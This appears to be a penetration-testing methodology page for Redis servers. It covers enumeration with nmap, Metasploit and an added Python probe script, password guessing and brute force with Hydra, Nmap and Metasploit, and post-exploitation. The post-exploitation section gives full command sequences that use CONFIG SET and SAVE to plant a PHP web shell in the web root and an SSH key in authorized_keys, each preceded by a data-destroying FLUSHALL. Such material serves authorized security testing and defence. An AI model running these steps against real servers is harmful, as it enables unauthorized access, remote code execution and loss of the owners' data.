
Redis

Default Port: 6379

Redis is an open-source, BSD-licensed in-memory data structure store: a key-value database with rich value types (strings, lists, sets, sorted sets, hashes) that is used as a database, a caching layer and a message broker. It speaks RESP, a simple plaintext protocol, and can optionally wrap connections in TLS (built into the server since Redis 6.0); most deployments you will meet still run plaintext, so credentials and data cross the wire unencrypted.

An instance reachable without authentication, or protected only by a guessable password, is a serious finding: a client that can run commands reads the whole dataset, and, because CONFIG SET lets it choose where and under what name the server writes its dump file, it often gets the host as well (see Post-Exploitation).

Connect

Connect Using redis-cli Command

redis-cli -h <hostname> -p <port-number> --user <username> -a <password>

#port number is optional
#username is optional
#password is optional

URL

The Redis connection URL packs everything an application needs to connect into one string. The general form is

redis://[<username>[:<password>]@]<hostname>[:<port>][/<db>]

With a password but no username (the pre-6 requirepass style, which maps to the built-in user named default on Redis 6+) this becomes:

redis://:<password>@<hostname>:<port>

The rediss:// scheme (two s) selects TLS. These URLs turn up in application configs, environment variables and source repositories, so they are worth grepping for during an engagement.

Enumeration

Identifying a Redis Server

A plain port scan only tells you that 6379 is open; add service detection so Nmap actually matches the Redis protocol, and the redis-info script dumps the server's INFO output when the instance accepts unauthenticated commands:

nmap -p 6379 -sV --script redis-info X.X.X.X

Assessment with Metasploit

Metasploit's redis_server scanner connects to each host, issues INFO by default and reports the version and configuration details it gets back, which makes it a quick way to triage a range for unauthenticated instances:

use auxiliary/scanner/redis/redis_server
msf auxiliary(scanner/redis/redis_server) > set rhosts X.X.X.X
msf auxiliary(scanner/redis/redis_server) > exploit

Redis sends no banner on connect, so a raw connection stays silent until you talk to it. Connect with Netcat and type a command: PING answers +PONG on an open instance, -NOAUTH Authentication required. when a password is set, and -DENIED ... when protected mode refused a non-local client; INFO server returns redis_version, the OS and build details. Redis accepts these inline (space-separated) commands as well as the RESP form that redis-cli sends.

nc -nv X.X.X.X 6379
PING
INFO server
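
The enumeration steps above can be scripted with a few dozen lines of Python; the following is an added example, not code from the original page or from the Redis project. It encodes commands in RESP the way redis-cli does, parses the replies, and reports whether the endpoint needs authentication, which version it runs and whether CONFIG is readable. The function and file names (probe, redisprobe.py) are this example's own; the host and password come from the command line.

```python
import socket
import sys


class Incomplete(Exception):
    """parse_resp raises this when the buffer does not yet hold a whole reply."""


class RespError(Exception):
    """A '-' error reply, e.g. NOAUTH, WRONGPASS or DENIED (protected mode)."""


def encode_command(*args):
    """Serialize a command as a RESP array of bulk strings, the wire form redis-cli sends."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_resp(buf):
    """Parse one RESP2 reply from buf; return (value, unconsumed_bytes).

    Error replies come back as RespError instances instead of being raised,
    because NOAUTH or DENIED is itself useful enumeration data.
    """
    if not buf:
        raise Incomplete
    kind, rest = buf[:1], buf[1:]
    line, sep, rest = rest.partition(b"\r\n")
    if not sep:
        raise Incomplete
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RespError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest                      # null bulk string
        if len(rest) < n + 2:
            raise Incomplete
        return rest[:n].decode(errors="replace"), rest[n + 2:]
    if kind == b"*":
        n = int(line)
        if n < 0:
            return None, rest                      # null array
        items = []
        for _ in range(n):
            item, rest = parse_resp(rest)          # a nested Incomplete propagates up
            items.append(item)
        return items, rest
    raise ValueError("unexpected RESP type byte %r" % kind)


def info_field(info, name):
    """Return the value of one 'name:value' line from an INFO reply, or None."""
    for line in info.splitlines():
        if line.startswith(name + ":"):
            return line.split(":", 1)[1].strip()
    return None


def command(sock, *args):
    """Send one command and read until its complete reply has been parsed."""
    sock.sendall(encode_command(*args))
    buf = b""
    while True:
        chunk = sock.recv(65536)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        try:
            return parse_resp(buf)[0]
        except Incomplete:
            continue


def probe(host, port=6379, password=None, timeout=5.0):
    """Connect, optionally AUTH, and report what a client at this endpoint can learn."""
    result = {"host": host, "port": port, "auth_required": None, "version": None, "config_readable": False}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if password is not None:
            # Single-argument AUTH works on every version; Redis 6+ also accepts AUTH <user> <pass>.
            auth = command(sock, "AUTH", password)
            if isinstance(auth, RespError):
                result["error"] = str(auth)
                return result
        ping = command(sock, "PING")
        if isinstance(ping, RespError):
            # NOAUTH: a password is set.  DENIED: protected mode refused a non-local client.
            result["auth_required"] = str(ping).startswith("NOAUTH")
            result["error"] = str(ping)
            return result
        result["auth_required"] = False
        info = command(sock, "INFO", "server")
        if isinstance(info, str):
            result["version"] = info_field(info, "redis_version")
        # Readable CONFIG means CONFIG SET dir/dbfilename (the persistence tricks under Post-Exploitation) is worth trying.
        cfg = command(sock, "CONFIG", "GET", "dir")
        if isinstance(cfg, list) and len(cfg) == 2:
            result["config_readable"] = True
            result["dir"] = cfg[1]
    return result


if __name__ == "__main__":
    # usage: redisprobe.py HOST [PASSWORD]
    print(probe(sys.argv[1], password=sys.argv[2] if len(sys.argv) > 2 else None))
```

Run it as python3 redisprobe.py X.X.X.X and, after a successful guess, again with the password as the second argument. The parser handles replies split across TCP segments (it keeps reading until a whole reply is present), which matters for long INFO output; the reply to CONFIG GET dir doubles as a check that CONFIG has not been renamed or disabled.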

Attack Vectors

Passwordless Authentication

Out of the box Redis has no password (requirepass is unset), so anyone who can reach the port can run commands. Versions before 3.2 also listened on all interfaces by default; since 3.2, protected mode refuses non-local clients unless a password or an explicit bind address is configured, but it is routinely switched off or bypassed by a bind 0.0.0.0 line, so unauthenticated instances remain common.

To connect without a password, you would use the following command:

redis-cli -h X.X.X.X

Common Credentials

If the server demands authentication, try common passwords before turning to brute force. Keep the version in mind: before Redis 6 there are no users at all, only a single password checked by AUTH <password>; on Redis 6+ the ACL system adds usernames, but the password from requirepass belongs to the built-in user named default, so trying passwords against default covers most deployments. Common guesses include admin, administrator, root, user and test. This is far less noisy than a full brute-force run and should be tried first.

redis-cli -h X.X.X.X --user <username> -a <password>

#provide a common username
#provide a common password

Bruteforcing Credentials

A brute-force attack involves trying many passwords or usernames to find the right one for accessing a system.

Tools like Hydra are network login crackers that support many services (Redis, HTTP, SMB and others). Against Redis, Hydra performs a dictionary attack: it reads candidate passwords from a file and issues AUTH with each one until the server accepts.

Bruteforcing with Hydra

Hydra's redis module sends the legacy single-argument AUTH, so it takes a password list (or one password) but no username list; -s sets a non-default port, -S wraps the connection in TLS and -f stops at the first success:

hydra [-P pass.txt or -p password] -f [-s port] [-S] redis://X.X.X.X

Bruteforcing with Nmap

It is also possible to perform brute force on Redis with Nmap scripts:

nmap -p 6379 --script redis-brute X.X.X.X

Bruteforcing with Metasploit

It is also possible to apply brute force with Metasploit modules on Redis:

use auxiliary/scanner/redis/redis_login
msf auxiliary(scanner/redis/redis_login) > set rhosts X.X.X.X
msf auxiliary(scanner/redis/redis_login) > set user_file /path/to/user.txt
msf auxiliary(scanner/redis/redis_login) > set pass_file /path/to/pass.txt
msf auxiliary(scanner/redis/redis_login) > set stop_on_success true
msf auxiliary(scanner/redis/redis_login) > exploit

Post-Exploitation

Common Redis Commands

Once you have a session, INFO, DBSIZE, KEYS * and CONFIG GET * show what the instance holds and how it is set up; the commands below then read and modify the individual data types you will find.

| Command | Description | Usage |
|---|---|---|
| SET | Sets the value of a key | SET key value |
| GET | Gets the value of a key | GET key |
| DEL | Deletes one or more keys | DEL key1 [key2 ...] |
| KEYS | Lists all keys matching a pattern | KEYS pattern |
| EXPIRE | Sets an expiration time on a key | EXPIRE key seconds |
| TTL | Gets the remaining time to live of a key | TTL key |
| INCR | Increments the value of a key | INCR key |
| DECR | Decrements the value of a key | DECR key |
| LPUSH | Prepends one or more values to a list | LPUSH key value [value ...] |
| RPUSH | Appends one or more values to a list | RPUSH key value [value ...] |
| LPOP | Removes and returns the first element of a list | LPOP key |
| RPOP | Removes and returns the last element of a list | RPOP key |
| SADD | Adds one or more members to a set | SADD key member [member ...] |
| SMEMBERS | Gets all members of a set | SMEMBERS key |
| ZADD | Adds one or more members to a sorted set | ZADD key score member [score member ...] |
| ZRANGE | Returns a range of members of a sorted set | ZRANGE key start stop [WITHSCORES] |
| HSET | Sets one or more fields in the hash stored at key | HSET key field value [field value ...] |
| HGET | Gets the value of a field in the hash stored at key | HGET key field |
| HDEL | Deletes one or more fields from the hash stored at key | HDEL key field [field ...] |
| HMSET | Sets multiple fields in the hash stored at key (deprecated since Redis 4.0.0; use HSET) | HMSET key field1 value1 [field2 value2 ...] |

Exploiting Redis for Remote Code Execution

CONFIG SET lets a client choose the directory and file name of the RDB dump, and SAVE writes it synchronously. If the redis process can write into a directory the web server serves and that server executes PHP, a value stored in the database lands inside a .php file: the RDB header and trailer around it are binary junk that PHP passes through as output, and only the text between <?php and ?> runs. The sequence below does exactly that (note the shell quoting: the payload contains $_REQUEST['cmd'], so the value is wrapped in double quotes with the dollar sign escaped, otherwise the inner single quotes end the shell string):

$ redis-cli -h X.X.X.X flushall
$ redis-cli -h X.X.X.X set pwn "<?php system(\$_REQUEST['cmd']); ?>"
$ redis-cli -h X.X.X.X config set dbfilename shell.php
$ redis-cli -h X.X.X.X config set dir /var/www/html
$ redis-cli -h X.X.X.X save

Then request http://X.X.X.X/shell.php?cmd=id. Two caveats: FLUSHALL destroys every key in every database, so on a real engagement record it as a destructive action (it only exists here to keep other data out of the dump), and Redis 7.0 and later mark dir and dbfilename as protected configs, so a non-local client gets an error from CONFIG SET unless the administrator has set enable-protected-configs yes. The file is written as the redis user, so the web root must be writable by it.

Unauthorized SSH Access via Redis Exploitation

The same dump-file trick writes an SSH public key into the authorized_keys file of the account Redis runs as. The key is wrapped in blank lines so that the binary RDB bytes before and after it sit on lines of their own; sshd silently skips lines it cannot parse, so the one valid key line is enough. The directory must already exist (Redis cannot create it, and CONFIG SET dir fails if it is missing) and be writable by the redis user; /var/lib/redis is the home directory the Debian and Ubuntu packages give that user, so check INFO and CONFIG GET dir rather than assuming it. Note that -x makes redis-cli read the last argument from standard input.

$ ssh-keygen -t ecdsa -b 521 -f key
$ (echo -e "\n\n"; cat key.pub; echo -e "\n\n") > key.txt
$ redis-cli -h X.X.X.X flushall
$ cat key.txt | redis-cli -h X.X.X.X -x set pwn
$ redis-cli -h X.X.X.X config set dbfilename authorized_keys
$ redis-cli -h X.X.X.X config set dir /var/lib/redis/.ssh
$ redis-cli -h X.X.X.X save
$ ssh -i key redis@X.X.X.X

Many packaged installs give the redis user no login shell, in which case the key is accepted but the session is closed immediately; the same Redis 7 protected-config restriction on CONFIG SET dir/dbfilename applies here too.